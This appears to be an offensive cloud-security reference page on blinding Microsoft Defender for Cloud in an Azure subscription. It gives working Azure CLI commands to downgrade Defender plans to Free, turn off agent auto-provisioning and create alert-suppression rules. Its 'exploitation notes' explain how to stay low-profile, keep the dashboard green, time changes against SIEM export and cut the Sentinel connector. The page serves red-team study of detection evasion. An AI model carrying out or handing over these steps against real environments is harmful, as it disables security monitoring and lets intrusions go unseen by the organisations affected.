Microsoft Defender for Cloud is the posture and threat-detection layer that raises alerts on suspicious resource behaviour (anomalous VM commands, Key Vault access, storage exfiltration). An operator with Microsoft.Security/* write drops its paid plans to Free, kills auto-provisioning of the agents that feed it, and suppresses the alerts it would raise.
Downgrade the plans#
# see which plans are on, then drop the ones watching your target to Free
az security pricing list -o table
az security pricing create -n VirtualMachines --tier Free
az security pricing create -n StorageAccounts --tier Free
az security pricing create -n KeyVaults --tier Free
Kill telemetry and suppress alerts#
# stop auto-provisioning the monitoring agent that feeds detections
az security auto-provisioning-setting update -n default --auto-provision Off
# create an alert suppression (dismiss) rule for the alert types you will trigger
az security alerts-suppression-rule update --rule-name quiet \
--alert-type <AlertTypeName> --reason "Other" --state Enabled
Exploitation notes#
- Plan state is per-subscription; in a multi-subscription tenant, downgrade only where you operate to stay low-profile, since a tenant-wide change is itself conspicuous.
- Suppression rules are quieter than disabling the whole plan: the plan stays green while the specific alert you expect is auto-dismissed.
- These
Microsoft.Securitywrites land in the Activity Log; time them against what still exports to a SIEM. - Defender alerts often flow into Sentinel through a connector, so disabling the connector there can blind the same alerts from the other end.
Tools#
- Azure CLI (
az security pricing,az security auto-provisioning-setting,az security alerts-suppression-rule). - MicroBurst / PowerZure: posture enumeration and bulk changes.